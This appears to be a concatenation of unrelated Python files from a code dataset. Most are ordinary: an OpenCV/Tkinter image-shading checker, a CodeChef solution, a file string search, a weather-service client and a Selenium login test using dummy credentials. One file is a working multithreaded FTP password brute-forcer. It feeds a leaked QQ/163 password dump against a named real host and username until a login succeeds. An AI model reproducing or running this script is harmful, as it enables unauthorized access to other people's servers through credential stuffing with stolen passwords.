    gShadingINFO: dict
        Per-rectangle measurement results in the format
        { nameID: {"Y":int, "R":int, "G":int, "B":int,
                   "Vt":(x,y), "Vb":(x,y)} }
        where Vt/Vb are the top-left and bottom-right vertexes.

    Fixes over the previous version
    -------------------------------
    * ``_property`` now carries defaults for the four enable flags read by
      show(); previously they only existed after set_property() supplied
      them, so calling show() directly raised KeyError.
    * The if/elif chain in set_property() is replaced by a whitelist.
    * A dead ``if False:`` debug block (which referenced an undefined
      ``cv_img`` and contained a garbled comment) has been removed from
      _calculate_all_shadings().
    """

    # Property keys accepted by set_property(); anything else is ignored,
    # matching the old if/elif chain's behavior.
    _KNOWN_PROPERTIES = (
        'c_size_ratio', 'e_size_ratio', 'd_field', 'hv_field',
        'h_enable', 'v_enable', 'luma_enable', 'chroma_enable',
    )

    def __init__(self, imgW, imgH):
        """Initialize all shading rectangles for an imgW x imgH image.

        Arguments
        ------------
        imgW, imgH: integer
            the size of the source image

        Returns
        --------------
        None
        """
        self._property = {
            'c_size_ratio' : 0.1,
            'e_size_ratio' : 0.1,
            'd_field' : 1.0,
            'hv_field' : 1.0,
            # Defaults for the flags read by show(); chosen to match the
            # GUI's initial state (luma/chroma checks on, H/V checks off)
            # so show() works even before set_property() is called.
            'h_enable' : False,
            'v_enable' : False,
            'luma_enable' : True,
            'chroma_enable' : True,
        }
        #-- store global variables
        self.gImgW = imgW
        self.gImgH = imgH
        self.gShadingINFO = {}
        #-- derive image center coordinate
        self.gImgXc = int(imgW / 2)
        self.gImgYc = int(imgH / 2)
        # Center (C) and edge (E) rectangle sizes derived from the ratios.
        self.gCRoiW = int(imgW * self._property['c_size_ratio'])
        self.gCRoiH = int(imgH * self._property['c_size_ratio'])
        self.gERoiW = int(imgW * self._property['e_size_ratio'])
        self.gERoiH = int(imgH * self._property['e_size_ratio'])
        #-- create the ROI list
        self.gShadingRECT = ROI.ImageROI(imgW, imgH)
        self._create_shading_rectangles()

    def set_property(self, **kwargs):
        """Set properties of the image shading check.

        Properties are specified as keyword arguments, e.g. c_size_ratio=0.1.
        Unknown keywords are silently ignored.

        Arguments
        --------------
        c_size_ratio: float
            center rectangle size as a fraction of the image size
            (intended range 0.05 .. 0.3)
        e_size_ratio: float
            edge (diagonal, top/bottom, left/right) rectangle size as a
            fraction of the image size (intended range 0.05 .. 0.2)
        d_field: float
            image field of the diagonal rectangles (0.3 .. 1.0)
        hv_field: float
            image field of the horizontal/vertical rectangles (0.3 .. 1.0)
        h_enable: boolean
            Enable/Disable horizontal shading (Hr, Hl) verification
        v_enable: boolean
            Enable/Disable vertical shading (Vt, Vb) verification
        luma_enable: boolean
            Enable/Disable luma shading verification
        chroma_enable: boolean
            Enable/Disable chroma shading verification
        """
        for argkey, argval in kwargs.items():
            if argkey in self._KNOWN_PROPERTIES:
                self._property[argkey] = argval

    def _set_QHV_rect(self, rect_name, Po, Pv, fraction):
        """Add an edge rectangle centered on the Po->Pv line at *fraction*."""
        x, y = ROI.interpolateXY(Po, Pv, fraction)
        self.gShadingRECT.add(rect_name, (x, y), (self.gERoiW, self.gERoiH))

    def _create_shading_rectangles(self):
        """Register all nine shading rectangles with the ROI list."""
        #-- Center: Co
        rect_name='Co'
        self.gShadingRECT.add(rect_name, (self.gImgXc, self.gImgYc), (self.gCRoiW, self.gCRoiH))
        Po = (self.gImgXc, self.gImgYc)
        #-- Quadrants: Q1, Q2, Q3, Q4 (Pv is the image corner of each quadrant)
        fraction = self._property['d_field']
        Q1param = { 'name':'Q1', 'Pv':(self.gImgW, 0) }
        Q2param = { 'name':'Q2', 'Pv':(0, 0) }
        Q3param = { 'name':'Q3', 'Pv':(0, self.gImgH) }
        Q4param = { 'name':'Q4', 'Pv':(self.gImgW, self.gImgH) }
        Qplist = [ Q1param, Q2param, Q3param, Q4param ]
        for Qp in Qplist:
            self._set_QHV_rect(Qp['name'], Po, Qp['Pv'], fraction)
        #-- Latitude (Horizontal): Hr(right), Hl(left)
        fraction = self._property['hv_field']
        Hrparam = { 'name':'Hr', 'Pv':(self.gImgW, int(self.gImgH/2)) }
        Hlparam = { 'name':'Hl', 'Pv':(0, int(self.gImgH/2)) }
        Hplist = [ Hrparam, Hlparam ]
        for Hp in Hplist:
            self._set_QHV_rect(Hp['name'], Po, Hp['Pv'], fraction)
        #-- Longitude (Vertical): Vt(top), Vb(bottom)
        Vtparam = { 'name':'Vt', 'Pv':(int(self.gImgW/2), 0) }
        Vbparam = { 'name':'Vb', 'Pv':(int(self.gImgW/2), self.gImgH) }
        Vplist = [ Vtparam, Vbparam ]
        for Vp in Vplist:
            self._set_QHV_rect(Vp['name'], Po, Vp['Pv'], fraction)

    def _update_QHV_rect(self, rect_name, Po, Pv, fraction):
        """Move/resize an existing edge rectangle along the Po->Pv line."""
        x, y = ROI.interpolateXY(Po, Pv, fraction)
        self.gShadingRECT.set_center(rect_name, x, y)
        self.gShadingRECT.set_size(rect_name, self.gERoiW, self.gERoiH)

    def _update_all_rectangles(self):
        """Recompute center/size of every rectangle from current properties."""
        rect_name='Co'
        self.gCRoiW = int(self.gImgW * self._property['c_size_ratio'])
        self.gCRoiH = int(self.gImgH * self._property['c_size_ratio'])
        self.gShadingRECT.set_size(rect_name, self.gCRoiW, self.gCRoiH)
        Po = (self.gImgXc, self.gImgYc)
        self.gERoiW = int(self.gImgW * self._property['e_size_ratio'])
        self.gERoiH = int(self.gImgH * self._property['e_size_ratio'])
        #-- Quadrants: Q1, Q2, Q3, Q4
        fraction = self._property['d_field']
        Q1param = { 'name':'Q1', 'Pv':(self.gImgW, 0) }
        Q2param = { 'name':'Q2', 'Pv':(0, 0) }
        Q3param = { 'name':'Q3', 'Pv':(0, self.gImgH) }
        Q4param = { 'name':'Q4', 'Pv':(self.gImgW, self.gImgH) }
        Qplist = [ Q1param, Q2param, Q3param, Q4param ]
        for Qp in Qplist:
            rect_name = Qp['name']
            self._update_QHV_rect(rect_name, Po, Qp['Pv'], fraction)
        #-- Latitude (Horizontal): Hr(right), Hl(left)
        fraction = self._property['hv_field']
        Hrparam = { 'name':'Hr', 'Pv':(self.gImgW, int(self.gImgH/2)) }
        Hlparam = { 'name':'Hl', 'Pv':(0, int(self.gImgH/2)) }
        Hplist = [ Hrparam, Hlparam ]
        for Hp in Hplist:
            rect_name = Hp['name']
            self._update_QHV_rect(rect_name, Po, Hp['Pv'], fraction)
        #-- Longitude (Vertical): Vt(top), Vb(bottom)
        Vtparam = { 'name':'Vt', 'Pv':(int(self.gImgW/2), 0) }
        Vbparam = { 'name':'Vb', 'Pv':(int(self.gImgW/2), self.gImgH) }
        Vplist = [ Vtparam, Vbparam ]
        for Vp in Vplist:
            rect_name = Vp['name']
            self._update_QHV_rect(rect_name, Po, Vp['Pv'], fraction)

    def _calculate_all_shadings(self, cvSrcImg):
        """Measure mean Y and B/G/R of every shading rectangle of *cvSrcImg*.

        Results are stored in self.gShadingINFO as
        { nameID: {"Y":..,"R":..,"G":..,"B":..,"Vt":(x,y),"Vb":(x,y)} }.

        Arguments
        --------------
        cvSrcImg: cv Mat
            the source image to get sub-image of each shading rectangle
        """
        #-- clear the shading info list
        self.gShadingINFO.clear()
        #-- get vertexes of all shading rectangles
        allRect = self.gShadingRECT.get_vertex_all()
        #-- calculate Y, R/G/B of each sub-image
        for rect in allRect:
            nameID = rect[0]
            VPt = rect[1]
            VPb = rect[2]
            subimg = cvSrcImg[VPt[1]:VPb[1], VPt[0]:VPb[0]]
            subGray = cv2.cvtColor(subimg, cv2.COLOR_BGR2GRAY)
            # OpenCV images are BGR-ordered; hence channel 0 is blue.
            Bmean = int(np.mean(subimg[:,:,0]))
            Gmean = int(np.mean(subimg[:,:,1]))
            Rmean = int(np.mean(subimg[:,:,2]))
            Ymean = int(np.mean(subGray))
            shadingDict = { "Y":Ymean, "R":Rmean, "G":Gmean, "B":Bmean, "Vt":VPt, "Vb":VPb }
            self.gShadingINFO.setdefault(nameID, shadingDict)

    def update(self, cvSrcImg):
        """Update vertexes and Y, R/G/B values of all shading rectangles.

        Call this method to refresh vertexes and sub-image values after
        properties are changed via set_property().

        Arguments
        --------------
        cvSrcImg: cv2 Mat
            The source image which is used to get sub-image of each
            shading rectangle to calculate the luma/chroma information.

        Returns
        -------------
        gShadingINFO: dict
            { nameID: {"Y":..,"R":..,"G":..,"B":..,"Vt":(x,y),"Vb":(x,y)} }
            where Y/R/G/B are mean values over the shading block and
            Vt/Vb are its top-left and bottom-right points.
        """
        #-- Update vertexes of each shading rectangles
        self._update_all_rectangles()
        self.gShadingRECT.update()
        #-- Recalculate Y, R/G/B values of each shading rectangles
        self._calculate_all_shadings(cvSrcImg)
        return self.gShadingINFO

    def show(self, cv_win, cv_img):
        """Draw all shading rectangles onto *cv_img* and display it.

        Each edge rectangle is drawn green when it passes the enabled
        checks, red otherwise:
          * luma  : its mean Y must be within +/-20% of the center's Y
          * chroma: its R/G and B/G ratios must be within +/-10% of 1.0
        H/V rectangles are skipped entirely when their checks are disabled.

        Arguments
        --------------
        cv_win: cv2 window name
            The window to display the image with shading rectangles
        cv_img: cv2 Mat
            The image to draw shading rectangles on
        """
        color_pass = (0, 255, 0)    # BGR green
        color_ng = (0, 0, 255)      # BGR red
        Co = self.gShadingINFO['Co']
        Co_Y = Co['Y']
        lwidth = 2
        for k in self.gShadingINFO:
            shadingRect = self.gShadingINFO[k]
            Vt = shadingRect.get('Vt')
            Vb = shadingRect.get('Vb')
            _Y = shadingRect['Y']
            _R = shadingRect['R']
            _G = shadingRect['G']
            _B = shadingRect['B']
            #-- ratios used by the luma / chroma checks
            Y_ratio = _Y/Co_Y
            R_ratio = _R/_G
            B_ratio = _B/_G
            is_pass = True
            if self._property['luma_enable'] == True:
                if Y_ratio < 0.8 or Y_ratio > 1.2:
                    is_pass = False
            if self._property['chroma_enable'] == True:
                if R_ratio < 0.9 or R_ratio > 1.1:
                    is_pass = False
                elif B_ratio < 0.9 or B_ratio > 1.1:
                    is_pass = False
            # The center rectangle is the reference and is always green.
            if is_pass or k == 'Co':
                color = color_pass
            else:
                color = color_ng
            # Skip drawing H/V rectangles when their checks are disabled.
            if self._property['h_enable']==False and (k=='Hr' or k=='Hl'):
                pass
            elif self._property['v_enable']==False and (k=='Vt' or k=='Vb'):
                pass
            else:
                cv2.rectangle(cv_img, Vt, Vb, color, lwidth)
        cv2.imshow(cv_win, cv_img)
###########################################################
# Function : cbfn_Update()
###########################################################
def cbfn_Update():
    """Push the current GUI control values into gImageShading and redraw.

    Reads the check-buttons and sliders, updates the shading properties,
    then recomputes and redisplays the overlay. Does nothing (beyond an
    error message) until an image has been opened.
    """
    global scl_windowSize, scl_fieldDiag, scl_fieldHV
    global var_chkLuma, var_chkChroma
    global var_chkHori, var_chkVert
    global gIsImgOpened
    if not gIsImgOpened:
        print('Error: image not opened yet!!')
        return
    # The H/V check-buttons drive both the enable flags and whether the
    # H/V field slider is usable at all.
    horizontal_on = (var_chkHori.get() == 1)
    vertical_on = (var_chkVert.get() == 1)
    scl_fieldHV.config(state=NORMAL if (horizontal_on or vertical_on) else DISABLED)
    gImageShading.set_property(h_enable=horizontal_on)
    gImageShading.set_property(v_enable=vertical_on)
    gImageShading.set_property(luma_enable=(var_chkLuma.get() == 1))
    gImageShading.set_property(chroma_enable=(var_chkChroma.get() == 1))
    # A single slider controls both the center and edge rectangle sizes.
    window_ratio = scl_windowSize.get()
    gImageShading.set_property(c_size_ratio=window_ratio)
    gImageShading.set_property(e_size_ratio=window_ratio)
    gImageShading.set_property(d_field=scl_fieldDiag.get())
    gImageShading.set_property(hv_field=scl_fieldHV.get())
    # Draw on a fresh copy so the pristine source image stays untouched.
    overlay = gImgSrc.copy()
    gImageShading.update(overlay)
    gImageShading.show(gSrcImgName, overlay)
###########################################################
# Message Box with OK button
###########################################################
def messageBoxOK(title, msg):
    """Pop up a small dialog showing *msg* with a single OK button."""
    dialog = Toplevel()
    dialog.title(title)
    Label(dialog, text=msg).pack()
    # OK simply closes the dialog window.
    Button(dialog, text='OK', command=dialog.destroy).pack()
###########################################################
# Function: Parse file's path/basename/extname
###########################################################
def parse_file_path(fpath):
    """Split *fpath* into (directory, base name, extension).

    Example: '/a/b/c.txt' -> ('/a/b', 'c', '.txt').
    The components are also echoed to stdout, matching the original
    diagnostic output the GUI relies on for tracing.

    Changes: removed a dead, commented-out try/except variant and a
    misleading comment claiming this function creates a folder (it only
    parses the path).

    Arguments
    ------------
    fpath: str
        Path as returned by the file-open dialog.

    Returns
    -------------
    (fdir, fbase, fext): tuple of str
        Directory part, file name without extension, and extension
        including the dot; each may be '' when absent from fpath.
    """
    print('Input filename: ', fpath)
    fdir = os.path.dirname(fpath)
    ffile = os.path.basename(fpath)
    fbase, fext = os.path.splitext(ffile)
    print('Directory: ', fdir)
    print("fbase= ", fbase, 'fext= ', fext)
    return fdir, fbase, fext
###########################################################
# Function : Callback of Button RESET
###########################################################
def cbfnButtonReset():
    """Close every OpenCV window and revert the button to 'Select Image' mode."""
    cv2.destroyAllWindows()
    btnSelectIMG.config(text='Select Image', command=cbfnButton_SelectIMG, bg='LightGreen')
###########################################################
# Button Function : SelectIMG
###########################################################
def cbfnButton_SelectIMG():
    """Callback for the 'Select Image' button.

    Asks the user for an image file, loads it with OpenCV into a resizable
    preview window, spawns a watcher thread that resets the GUI when that
    window is closed, then creates the ImageShading object and triggers
    the first overlay refresh.

    Fix: ``time`` and ``_thread`` are used below but were never imported
    anywhere in this module. The resulting NameError was swallowed by the
    bare except around the thread start, which returned early -- so
    gImageShading was never created and the shading overlay never worked.
    They are now imported locally. Bare ``except:`` clauses were also
    narrowed to ``except Exception:``.
    """
    import time
    import _thread
    global gOpenFileName, gSrcImgName, gSrcImgDir, gSrcImgBase, gSrcImgExt
    global gImgH, gImgW, gImgXc, gImgYc
    global gRoiW, gRoiH
    global gShadingRECT
    global gImgWC, gImgSrc
    gOpenFileName = filedialog.askopenfilename()
    try:
        gSrcImgDir, gSrcImgBase, gSrcImgExt = parse_file_path(gOpenFileName)
    except Exception:
        messageBoxOK('FileIO', 'Failed to open file :\n' + gOpenFileName)
        cbfnButtonReset()
        return
    # -- modify title of main window, change button to RESET
    gSrcImgName = gSrcImgBase + gSrcImgExt
    winRoot.title(winTitle+ ' -- ' + gSrcImgName)
    btnSelectIMG.config(text='RESET', command=cbfnButtonReset, bg='Yellow')
    # -- Open and show image with CV2
    os.chdir(gSrcImgDir)
    try:
        # cv2.imread returns None on failure; the .shape access below then
        # raises, landing us in the except branch.
        gImgSrc = cv2.imread(gOpenFileName)
        print('Image Size: ', gImgSrc.shape[1], '*', gImgSrc.shape[0])
        cv2.namedWindow(gSrcImgName, cv2.WINDOW_NORMAL)
    except Exception:
        messageBoxOK('FileIO', 'CV2 failed to load image file :\n' + gOpenFileName)
        cbfnButtonReset()
        return
    #-- shrink the preview window to height 480 while keeping aspect ratio
    # NOTE(review): the guard compares shape[1] (width) against resizeH --
    # probably shape[0] (height) was intended; kept as-is.
    resizeH = 480
    if gImgSrc.shape[1] > resizeH:
        w = int(resizeH*gImgSrc.shape[1]/gImgSrc.shape[0])
        h = resizeH
        cv2.resizeWindow(gSrcImgName, w, h)
        print('Output window resized to: ', w, '*', h)
    # -- watcher thread: reset the GUI once the preview window is closed
    def PROC_check_window_status(namedWin, slp_time):
        while True:
            if cv2.getWindowProperty(namedWin, 1) < 0:
                cbfnButtonReset()
                break
            time.sleep(slp_time)
    try:
        _thread.start_new_thread(PROC_check_window_status, (gSrcImgName, 0.2))
    except Exception:
        print("Error, failed to create new thread to watch named window: ", gSrcImgName)
        return
    #-- create the shading rectangles and draw the first overlay
    global gIsImgOpened
    gIsImgOpened = True
    global gImageShading
    gImageShading = ImageShading(gImgSrc.shape[1], gImgSrc.shape[0])
    cbfn_Update()
    return
###########################################################
# Button Function : Exit Main Window
###########################################################
def cbfnButtonMainExit():
    """Tear down all OpenCV windows and destroy the Tk main window.

    NOTE(review): not bound to any widget in main() as written -- confirm
    whether an Exit button was intended.
    """
    global winRoot
    cv2.destroyAllWindows()
    winRoot.destroy()
###########################################################
# MainEntry
###########################################################
from tkinter import * # Tk, Label, Entry, Radiobutton, IntVar, Button
from tkinter import filedialog
def main():
    """Build the Tk control panel and run the GUI event loop.

    Layout: a top frame with the 'Select Image' button, a middle frame
    with the luma/chroma check-buttons and the window-size slider, and a
    second middle frame with the image-field sliders plus the
    horizontal/vertical check-buttons. Every control change funnels into
    cbfn_Update().

    Fix: cbfn_Update() reads the global ``gIsImgOpened``, and the
    ``Scale.set(...)`` calls below fire their command callbacks during
    construction -- before any image is opened. Without initializing the
    flag first, those callbacks raised NameError at startup.
    """
    global winTitle, winRoot
    global scl_windowSize, scl_fieldDiag, scl_fieldHV
    global var_chkLuma, var_chkChroma
    global var_chkHori, var_chkVert
    global gOpenFileName, gSrcImgName, gSrcImgDir, gSrcImgBase, gSrcImgExt
    global btnSelectIMG
    global gIsImgOpened
    gIsImgOpened = False    # no image loaded yet; makes early callbacks no-ops
    winTitle = 'Shading Test'
    winRoot = Tk()
    winRoot.title(winTitle)
    winRoot.geometry('400x300+150+100')
    # -- Create Top/Mid/Buttom frames
    frame_padx = 2
    frame_pady = 2
    frmTop = Frame(winRoot)
    frmTop.pack(fill=X, padx=frame_padx, pady=frame_pady)
    frmMid1 = Frame(winRoot)
    frmMid1.pack(fill=X, padx=frame_padx, pady=frame_pady)
    frmMid2 = Frame(winRoot)
    frmMid2.pack(fill=X, padx=frame_padx, pady=frame_pady)
    # frmButtom = Frame(winRoot)
    # frmButtom.pack(fill=X, padx=frame_padx, pady=frame_pady)
    #------------------------------------
    # Frame Top
    #------------------------------------
    # -- Button : SelectIMG
    btnSelectIMG = Button(frmTop, text='Select Image', command=cbfnButton_SelectIMG, bg='LightGreen')
    btnSelectIMG.pack(fill=X)
    #------------------------------------
    # Frame Mid1
    #------------------------------------
    # Luma/chroma checks default to enabled (value=1).
    var_chkLuma = IntVar(value=1)
    chkbtn_Luma = Checkbutton(frmMid1, variable=var_chkLuma, text='Luma', command=cbfn_Update)
    chkbtn_Luma.pack(side=LEFT)
    var_chkChroma = IntVar(value=1)
    chkbtn_Chroma = Checkbutton(frmMid1, variable=var_chkChroma, text='Chroma', command=cbfn_Update)
    chkbtn_Chroma.pack(side=LEFT)
    def cbfnScale_WinSize(val):
        cbfn_Update()
        return
    scl_windowSize = Scale(frmMid1, label="Window Size (ratio): ", orient=HORIZONTAL, from_=0.02, to=0.2, resolution=0.01, command=cbfnScale_WinSize)
    scl_windowSize.pack(expand=True, side=RIGHT, fill=X, padx=16)
    scl_windowSize.set(0.1)
    #------------------------------------
    # Frame Mid2
    #------------------------------------
    frmMidLeft = Frame(frmMid2, bg='Red')
    frmMidLeft.pack(expand=True, fill=X, side=LEFT)
    frmMidRight = Frame(frmMid2, bg='Yellow')
    frmMidRight.pack(side=LEFT, padx=24)
    # -- Frame: MidLeft
    lbl_t = Label(frmMidLeft, anchor=W, text="Image Field:").pack(expand=True, fill=X)
    def cbfnScale_DiagImgField(val):
        cbfn_Update()
        return
    scl_fieldDiag = Scale(frmMidLeft, label='Diagnal: ', orient=HORIZONTAL, from_=0.1, to=1.0, resolution=0.05, command=cbfnScale_DiagImgField)
    scl_fieldDiag.pack(expand=True, fill=X)
    scl_fieldDiag.set(1.0)
    def cbfnScale_HvImgField(val):
        cbfn_Update()
        return
    scl_fieldHV = Scale(frmMidLeft, label='H/V: ', orient=HORIZONTAL, from_=0.1, to=1.0, resolution=0.05, command=cbfnScale_HvImgField)
    scl_fieldHV.pack(expand=True, fill=X)
    scl_fieldHV.set(1.0)
    # -- Frame: MidRight
    # H/V shading checks default to disabled (value=0).
    var_chkHori = IntVar(value=0)
    chkbtn_Hori = Checkbutton(frmMidRight, anchor=W, variable=var_chkHori, text='Horizontal', command=cbfn_Update)
    chkbtn_Hori.pack(side=TOP, expand=True, fill=X)
    var_chkVert = IntVar(value=0)
    chkbtn_Vert = Checkbutton(frmMidRight, anchor=W, variable=var_chkVert, text='Vertical', command=cbfn_Update)
    chkbtn_Vert.pack(side=TOP, expand=True, fill=X)
    winRoot.mainloop()
# Run the GUI only when executed as a script (not when imported as a module).
if __name__ == "__main__":
    main()
| true |
d1200006b8d7a18b11b01eff4fbf38d9dfd8958e | Python | shaswataddas/CodeChef_Contest_Code | /January Lunchtime 2021 Division 3/pair_me.py | UTF-8 | 144 | 3.40625 | 3 | [] | no_license | t = int(input())
# t (read from stdin just above) is the number of test cases; for each
# case, answer whether two of the three given integers sum to the third.
while t:
    # Read the three integers of this test case.
    x = list(map(int, input().split()))
    # After sorting, the only possible valid pairing is the two smallest
    # numbers adding up to the largest.
    x.sort()
    if(x[0]+x[1]==x[2]):
        print("YES")
    else:
        print("NO")
    t-=1
3a518159b005be51b7cdc2dd4c15fc8ffb14f08d | Python | Ruth-ikegah/python-mini-projects | /projects/String_search_from_multiple_files/findstring.py | UTF-8 | 701 | 3.34375 | 3 | [
"Python-2.0",
"MIT"
] | permissive | import os
# Search term and root directory are taken interactively from the user.
text = input("input text : ")
path = input("path : ")
# os.chdir(path)
def getfiles(path):
    """Recursively search *path* for a file containing the module-level
    string ``text``.

    Prints the matching file's absolute path and returns True on the first
    hit; returns False when no file under *path* contains ``text``.

    Fixes over the original version:
    * the recursive call's result is now propagated, so a match found in a
      subdirectory stops the whole search instead of being ignored;
    * the working directory is restored after recursing, so sibling entries
      scanned afterwards still resolve to existing files;
    * files are opened with ``with`` so handles are always closed;
    * the old ``f`` flag was dead (the function returned True before the
      ``f == 1`` check could ever run) and has been removed -- "not found"
      is now reported purely via the False return value.
    """
    os.chdir(path)
    current = os.getcwd()              # absolute form of *path*
    for file_name in os.listdir(current):
        abs_path = os.path.join(current, file_name)
        if os.path.isdir(abs_path):
            if getfiles(abs_path):     # propagate a hit from the subtree
                return True
            os.chdir(current)          # recursion changed cwd; restore it
        elif os.path.isfile(abs_path):
            with open(abs_path, "r") as handle:
                if text in handle.read():
                    print(text + " found in ")
                    print(abs_path)
                    return True
    return False
getfiles(path)
| true |
e116d2a607b98090f23d36542c4aaf01f3bc59e1 | Python | mlxzcax/data-analysis-of-Guangzhou-temperature | /countOfRain.py | UTF-8 | 374 | 3.375 | 3 | [] | no_license | import csv
count=0
i=1
while i<4:
s='%s月天气.csv' % i
with open(s,'r',encoding="utf-8") as csvfile:
reader = csv.DictReader(csvfile)
column1 = [row["天气状况"] for row in reader]
#找到含有雨字的项并计数
for x in column1:
if "雨" in x:
count+=1
i+=1
print("下雨天有%s天" % count)
| true |
7e705318e29d9ce48a5068d3521591bbf78b14c4 | Python | blessyann/MonCo-DataImmersive | /chapter8_8.py | UTF-8 | 838 | 4.6875 | 5 | [] | no_license | # Exercise 8.8 User Albums: Start with your program from Exercise 8.7. Write a "while" loop that allows users to enter an album's artist and title.
# Once you have that information, call "make_album()" with the user's input and print the dictionary that's created.
# Be sure to include a "quit" value in the while loop.
def make_album(artist_name, album_title):
    """Build an album record: the artist under 'name', the title under 'title'."""
    return {'name': artist_name, 'title': album_title}
# Interactive loop: keep asking for artist/title pairs and print the dict
# built by make_album(); typing 'quit' at either prompt exits.
while True:
    print("please enter 'quit' to stop")
    print("\nPlease tell artist name ")
    artist_name = input("Artist name: ")
    if artist_name == 'quit':
        break
    print("\n Enter Album title")
    album_title = input("Album title: ")
    if album_title == 'quit':
        break
    Album = make_album(artist_name,album_title)
    print(Album)
| true |
1b80d65adadcfa57c95c03074eddf185b30dc6c2 | Python | jeffrothkirch/BetterWeather | /controller/weather_service.py | UTF-8 | 2,138 | 2.828125 | 3 | [] | no_license | import datetime
import urllib2
import json
import weather_logic
WeatherServicePort = 8081
def ToString(date):
    """Format a date/datetime as an ISO 'YYYY-MM-DD' string."""
    return '{:%Y-%m-%d}'.format(date)
def fromString(dateString):
    """Parse an ISO 'YYYY-MM-DD' string back into a datetime.datetime."""
    iso_format = '%Y-%m-%d'
    return datetime.datetime.strptime(dateString, iso_format)
def GetWeather(location, dateString):
    """Return the cached weather entry whose 'date' equals *dateString*.

    Returns None when no entry for that exact date exists.
    """
    matches = (entry for entry in get_all_dates(location, dateString)
               if entry['date'] == dateString)
    return next(matches, None)
def GetSimilarDates(location, numDates, compareDateString):
    """Rank all cached dates by similarity to *compareDateString* and
    return the *numDates* most similar entries."""
    candidates = get_all_dates(location, compareDateString)
    reference = GetWeather(location, compareDateString)
    return weather_logic.RankDates(reference, candidates)[:numDates]
def GetPastForDate(location, desiredDate, desiredDelta):
    """Return cached entries sharing *desiredDate*'s month-day that fall
    within the last *desiredDelta* (a timedelta) before it."""
    cutoff = fromString(desiredDate) - desiredDelta
    month_day = desiredDate[5:]           # 'MM-DD' part of 'YYYY-MM-DD'
    return [entry for entry in get_all_dates(location, desiredDate)
            if entry['date'][5:] == month_day and fromString(entry['date']) > cutoff]
def get_all_dates(location, datestring):
    """Fetch the cached weather rows for location/date from the local
    backend (port 8081) and normalize them via convert_to_desired()."""
    url = '/'.join(['http://localhost:8081/cached', location, datestring, datestring])
    payload = urllib2.urlopen(url).read()
    return convert_to_desired(json.loads(payload))
def convert_to_desired(response):
    """Reshape raw backend rows (under response['result']) into the
    schema the rest of the service expects; numeric fields go through
    tryfloat() so malformed values degrade to 0."""
    return [
        {
            'date': row['date'],
            'descriptor': row['events'],
            'low': tryfloat(row['min_temperaturef']),
            'high': tryfloat(row['max_temperaturef']),
            'precipitation': tryfloat(row['precipitationin']),
            'cloudcover': tryfloat(row['cloudcover']),
        }
        for row in response['result']
    ]
def tryfloat(value):
    """Best-effort float conversion.

    Returns float(value) when possible and 0 otherwise. Besides
    ValueError (malformed strings), this now also absorbs TypeError so
    that missing fields (e.g. None coming back from the backend) degrade
    to 0 instead of crashing the conversion.
    """
    try:
        return float(value)
    except (ValueError, TypeError):
        return 0
| true |
c8dca3eb1296ed0f44657be23498bd8e178024ae | Python | taoranzhishang/Python_codes_for_learning | /study_code/Day_24/多进程密码破解/01多线程密码破解.py | UTF-8 | 1,461 | 2.78125 | 3 | [] | no_license | # http://hk801.pc51.com/ 破解FTP密码
'''
"user"
csdn user用户名
密码字典 password
'''
import ftplib
import threading
def TestFTP(addr, user, password):
with sem: # 锁定数量
try:
global isfind
myftp = ftplib.FTP(addr) # 登陆服务器
if isfind: # 找到退出循环
return
myftp.login(user, password)
print(user, password, "------------------------------------密码正确")
isfind = True
return user + "#" + password
except:
print(user, password, "密码不正确")
return ""
# 读取文件
sem = threading.Semaphore(20) # 限制线程的最大数量为2个
isfind = False
file = open("Z:\\F\\第一阶段视频\\20170531\\NBdata\\qqAnd163Password.txt", "rb")
while True:
if isfind: # 找到退出循环
break
line = file.readline() # 读取一行
line = line.decode("gbk", "ignore") # 转码
linelist = line.split(" # ")
if linelist[0] == "qq123456789":
print("---------------------------------------------")
# linelist[0] 密码
# TestFTP("hk801.pc51.com", "qinghuabeidacn517", linelist[0])
# list,批量管理
threading.Thread(target=TestFTP, args=("hk801.pc51.com", "qinghuabeidacn517", linelist[0])).start()
# print(line)
if not line:
break
# TestFTP("hk801.pc51.com","qinghuabeidacn517","qq123456789")
| true |
918764201b58d846081388453aa8287af933b59c | Python | s19497/TAU | /lab_8/test_classes.py | UTF-8 | 1,977 | 2.53125 | 3 | [] | no_license | from selenium.webdriver.remote.webdriver import WebDriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import NoSuchElementException
class TestWebsite:
    """Base class for site-test helpers; stores the shared Selenium driver."""
    def __init__(self, driver: WebDriver):
        # Selenium WebDriver instance used by all page interactions.
        self.driver = driver
class Allegro(TestWebsite):
    """Drives a login attempt on allegro.pl ending in a login error.

    NOTE(review): despite its name, print_button() performs a full login
    flow with dummy credentials and waits for the login error message to
    appear -- confirm the intended method name/behavior.
    """
    # Landing page the flow starts from.
    URL = 'https://allegro.pl'
    def print_button(self):
        """Open the site, dismiss the privacy dialog, submit bogus
        credentials and wait for the login error message.

        Raises selenium TimeoutException if any waited-for element does
        not appear within its deadline.
        """
        self.driver.get(self.URL)
        # Hard-coded XPaths for every element touched during the flow;
        # these are tied to the site's DOM at the time of writing.
        user_button_xpath = '/html/body/div[3]/div[5]/header/div/nav/div[5]/button'
        login_page_button_xpath = '/html/body/div[3]/div[5]/header/div/nav/div[5]/div/div/div/div/div/a'
        login_input_xpath = '//*[@id="login"]'
        password_input_xpath = '//*[@id="password"]'
        login_button_xpath = '//*[@id="authForm"]/div/div/div[2]/button'
        login_error_msg_xpath = '//*[@id="login-form-submit-error"]'
        # Privacy dialog blocks everything; wait up to 20s for it first.
        self._wait_for_privacy_button(20)
        self._click_xpath(user_button_xpath)
        self._click_xpath(login_page_button_xpath)
        # The login page may show the privacy dialog again (shorter wait).
        self._wait_for_privacy_button(2)
        self._input_xpath(login_input_xpath, 'test@test.test')
        self._input_xpath(password_input_xpath, 'haslo')
        self._click_xpath(login_button_xpath)
        # Invalid credentials: wait for the error message to show up.
        WebDriverWait(self.driver, 2).until(
            EC.presence_of_element_located((By.XPATH, login_error_msg_xpath))
        )
        print('DONE')
    def _click_xpath(self, xpath):
        """Click the element located by *xpath*."""
        self.driver.find_element(By.XPATH, xpath).click()
    def _input_xpath(self, xpath, value):
        """Type *value* into the element located by *xpath*."""
        self.driver.find_element(By.XPATH, xpath).send_keys(value)
    def _wait_for_privacy_button(self, seconds=2):
        """Wait up to *seconds* for the privacy-consent button, then click it."""
        privacy_button_xpath = '/html/body/div[3]/div[9]/div/div/div/div/div[2]/div[2]/button[1]'
        privacy_button = WebDriverWait(self.driver, seconds).until(
            EC.element_to_be_clickable((By.XPATH, privacy_button_xpath))
        )
        privacy_button.click()
| true |
